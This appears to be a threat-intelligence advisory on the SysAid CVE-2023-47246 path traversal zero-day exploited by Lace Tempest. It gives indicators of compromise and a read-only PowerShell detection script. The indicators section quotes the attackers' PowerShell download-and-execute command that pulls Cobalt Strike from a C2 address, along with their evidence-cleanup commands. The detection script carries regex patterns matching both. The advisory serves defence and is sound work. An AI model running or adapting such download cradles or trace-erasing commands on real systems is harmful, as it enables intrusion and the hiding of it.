Path Traversal Leading to Compromise: SysAid On-Prem Software CVE-2023-47246 Vulnerability

On November 2nd, an alarming zero-day vulnerability was identified within the SysAid on-premises software. This discovery prompted an immediate incident response, involving communications with on-premise customers and collaboration with Profero, a cybersecurity incident response firm. The vulnerability, exploited by the hacker group DEV-0950 (Lace Tempest), presents significant risks for users of affected SysAid software versions.

1. Nature and Severity of the Vulnerability in SysAid (CVE-2023-47246)

This zero-day vulnerability, a path traversal flaw leading to code execution, was exploited to upload malicious files to the SysAid Tomcat web service, granting unauthorized system access and control. CVE-2023-47246 allowed the attackers to execute malicious scripts and deploy the GraceWire trojan. Given its ability to compromise system integrity, this vulnerability is deemed highly critical.

According to the blog post written by the company’s CTO, Sasha Shapirov, the attacker uploaded a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service, which is ‘C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\’.

The WebShell gave the attacker unauthorized access to and control over the affected system. The attacker then used a PowerShell script, uploaded through the WebShell, to execute a malware loader, user[.]exe, on the vulnerable server, which in turn loaded the GraceWire trojan. The trojan is injected into one of the following processes:

  • spoolsv[.]exe
  • msiexec[.]exe
  • svchost[.]exe

After initial access was established, the attacker used a second PowerShell script to erase evidence of their activity from the server.

2. Which Versions of SysAid Are Affected?

Systems running SysAid on-premises software are at risk, specifically versions prior to 23.3.36. The vulnerability affects the software’s webroot directory, enabling attackers to carry out a range of malicious activities.

3. Is It Possible to Detect the Existence of the SysAid Vulnerability?

To determine whether a system has been affected, check for unauthorized access or suspicious file uploads in the SysAid Tomcat web service’s webroot directory. Monitoring processes such as spoolsv[.]exe, msiexec[.]exe, and svchost[.]exe for unusual activity is also critical.

SOC teams should look for specific IOCs, such as unusual IP addresses, file hashes, and suspicious commands, to detect and prevent exploitation. Monitoring PowerShell execution logs for abnormal activity and checking the targeted processes for unusual behavior are vital.

File Hashes:

  • user[.]exe

Hash: b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d

Comment: This is the hash for the “GraceWire” malicious loader. Searching for this specific hash across your systems can help identify the presence of this loader.

IP Addresses:

  • 81.19.138[.]52

Comment: GraceWire Loader Command and Control (C2) server.

  • 45.182.189[.]100

Comment: Another GraceWire Loader C2 server.

  • 179.60.150[.]34

Comment: Cobalt Strike C2 server.

  • 45.155.37[.]105

Comment: Meshagent remote admin tool C2 server.

These IP addresses are indicative of communication with the attacker’s infrastructure. Monitoring and blocking traffic to/from these IPs can be a key part of your response.

File Paths:

  • C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe

Comment: Path for the GraceWire loader.

  • C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war

Comment: Archive containing WebShells and tools used by the attacker.

  • C:\Program Files\SysAidServer\tomcat\webapps\leave

Comment: A flag used by the attacker’s scripts during execution.

Monitoring for changes, creations, or executions from these paths can reveal malicious activity.

Commands:

  • CobaltStrike Execution:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://179.60.150[.]34:80/a'))

This PowerShell command downloads and executes a CobaltStrike listener, indicating a significant breach.

  • Post-Compromise Cleanup Commands:

These commands are used by the attacker to clear traces of their presence.

Remove-Item -Path "$tomcat_dir\webapps\usersfiles\leave"

Remove-Item -Force "$wapps\usersfiles.war"

Remove-Item -Force "$wapps\usersfiles\user.*"

& "$wapps\usersfiles\user[.]exe"

  • Antivirus Detections (Microsoft Defender Identifications):

Trojan:Win32/TurtleLoader

Backdoor:Win32/Clop

Ransom:Win32/Clop

The vulnerability has been actively exploited by the DEV-0950 (Lace Tempest) group, deploying the GraceWire loader and potentially other malicious tools.
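The indicators listed in this section (file paths, the loader hash, the C2 addresses, the download cradle and the cleanup commands) can be checked in one pass on a SysAid host. The script below is an added example written for this page; it is not code from SOCRadar, SysAid or Profero. It assumes the default install path `C:\Program Files\SysAidServer\tomcat\webapps` quoted in the post and that PowerShell script block logging (event ID 4104) is enabled on the server; the IOC values themselves are the ones listed above with the defanging brackets removed. It only reads files, connections and event logs, and an empty result means only that none of these specific indicators were found, not that the server is clean.

```powershell
# Added example (not from the SOCRadar post or from SysAid): read-only compromise
# assessment for a SysAid on-premises server using the IOCs listed in the post.
# Run from an elevated PowerShell session on the SysAid host.

# Assumption: default SysAid Tomcat webapps directory from the advisory.
$SysAidWebapps = 'C:\Program Files\SysAidServer\tomcat\webapps'

# IOCs from the post (defanging brackets removed so they can be matched).
$LoaderHash  = 'b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d'
$C2Addresses = @('81.19.138.52', '45.182.189.100', '179.60.150.34', '45.155.37.105')
$SuspectPaths = @(
    (Join-Path $SysAidWebapps 'usersfiles\user.exe'),   # GraceWire loader
    (Join-Path $SysAidWebapps 'usersfiles.war'),        # WAR containing the WebShell
    (Join-Path $SysAidWebapps 'leave')                  # flag file used by the attacker's scripts
)

$findings = New-Object System.Collections.Generic.List[string]

# 1. Artefacts on disk, plus a SHA256 check of the loader if it is present.
foreach ($p in $SuspectPaths) {
    if (Test-Path -LiteralPath $p) {
        $findings.Add("File present: $p")
        if ($p -like '*.exe') {
            $h = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
            if ($h -ieq $LoaderHash) { $findings.Add("SHA256 matches the GraceWire loader: $p") }
        }
    }
}

# 2. Anything executable dropped into the user-upload webroot, regardless of name.
$userFiles = Join-Path $SysAidWebapps 'usersfiles'
if (Test-Path -LiteralPath $userFiles) {
    Get-ChildItem -Path $userFiles -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Extension -in '.jsp', '.war', '.exe', '.ps1', '.bat' } |
        ForEach-Object { $findings.Add("Executable or script content in usersfiles: $($_.FullName)") }
}

# 3. Live TCP connections to the listed C2 addresses, with the owning process.
Get-NetTCPConnection -ErrorAction SilentlyContinue |
    Where-Object { $C2Addresses -contains $_.RemoteAddress } |
    ForEach-Object {
        $proc = (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName
        $findings.Add("Connection to C2 $($_.RemoteAddress):$($_.RemotePort) from PID $($_.OwningProcess) ($proc)")
    }

# 4. Script block logs (event 4104): the download cradle, the cleanup script and the loader launch.
$patterns = @(
    'downloadstring\(.*179\.60\.150\.34',               # Cobalt Strike download cradle
    'Remove-Item.*usersfiles(\.war|\\leave|\\user\.)',  # post-compromise cleanup commands
    'usersfiles\\user\.exe'                             # execution of the loader
)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                       -ErrorAction SilentlyContinue
foreach ($e in $events) {
    $text = $e.Properties[2].Value   # ScriptBlockText is the third property of event 4104
    foreach ($re in $patterns) {
        if ($text -match $re) { $findings.Add("Script block at $($e.TimeCreated) matches '$re'"); break }
    }
}

if ($findings.Count -eq 0) { 'No CVE-2023-47246 indicators from this list were found.' }
else { $findings | ForEach-Object { "[!] $_" } }
```

Because the attacker's second script deletes user.exe, the WAR and the leave file, an absence of on-disk artefacts is expected on a cleaned-up host; the script block log and the Tomcat access logs for the usersfiles path are the more durable evidence, so step 4 should be read first on any server that was exposed before the 23.3.36 update.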

4. SOCRadar’s Role in Addressing the Issue

SOCRadar can assist in tackling this vulnerability through its XTI solution, providing enhanced threat intelligence and monitoring capabilities. It aids in identifying and responding to threats related to this vulnerability effectively.


The discovery of zero-day vulnerabilities like this one in SysAid’s on-premise software underscores the need for vigilant cybersecurity practices. Promptly updating to the latest software version and performing a thorough compromise assessment are imperative steps in protecting against this severe security threat.

The post Path Traversal Leading to Compromise: SysAid On-Prem Software CVE-2023-47246 Vulnerability appeared first on SOCRadar® Cyber Intelligence Inc.
